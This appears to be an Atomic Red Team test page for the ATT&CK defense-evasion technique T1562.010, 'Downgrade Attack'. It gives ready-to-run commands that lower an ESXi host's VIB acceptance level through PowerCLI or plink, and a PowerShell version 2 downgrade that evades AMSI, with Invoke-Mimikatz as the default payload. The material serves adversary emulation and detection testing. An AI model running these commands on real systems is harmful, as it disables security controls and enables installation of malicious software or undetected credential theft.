T1562.010
Impair Defenses: Downgrade Attack
Description from ATT&CK
Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.
Adversaries may downgrade and use various less-secure versions of features of a system, such as Command and Scripting Interpreters or even network protocols that can be abused to enable Adversary-in-the-Middle or Network Sniffing.(Citation: Praetorian TLS Downgrade Attack 2014) For example, PowerShell versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to Impair Defenses while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)
Atomic Tests
Atomic Test #1 - ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference
Supported Platforms: linux
auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local |
| vm_user | Specify the privilege user account on ESXi Server | string | root |
| vm_pass | Specify the privilege user password on ESXi Server | string | pass |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = "CommunitySupported"})
Disconnect-VIServer -Confirm:$false
Dependencies: Run with powershell!
Description: Check if VMWARE PowerCLI PowerShell Module is installed.
Check Prereq Commands:
1
2
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
Get Prereq Commands:
1
Install-Module -Name VMware.PowerCLI -Confirm:$false
Atomic Test #2 - ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference
Supported Platforms: windows
auto_generated_guid: 14d55b96-b2f5-428d-8fed-49dc4d9dd616
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local |
| vm_user | Specify the privilege user account on ESXi Server | string | root |
| vm_pass | Specify the privilege user password on ESXi Server | string | pass |
| plink_file | Path to plink | path | PathToAtomicsFolder..\ExternalPayloads\plink.exe |
| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt |
Attack Commands: Run with command_prompt!
1
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
Dependencies: Run with powershell!
Description: Check if plink is available.
Check Prereq Commands:
1
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
Atomic Test #3 - PowerShell Version 2 Downgrade
Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.
Supported Platforms: windows
auto_generated_guid: 47c96489-2f55-4774-a6df-39faff428f6f
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| v2_command | Specify the command to execute with Version 2 | string | Invoke-Mimikatz |
Attack Commands: Run with powershell!
1
PowerShell -version 2 -command '#{v2_command}'
Dependencies: Run with powershell!
Description: Check if Version 2 is installed. Check Prereq Commands:
1
2
$v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
if (-not $v2_installed) {exit 1} else {exit 0}
Get Prereq Commands:
1
echo "Manually install PowerShell Version 2"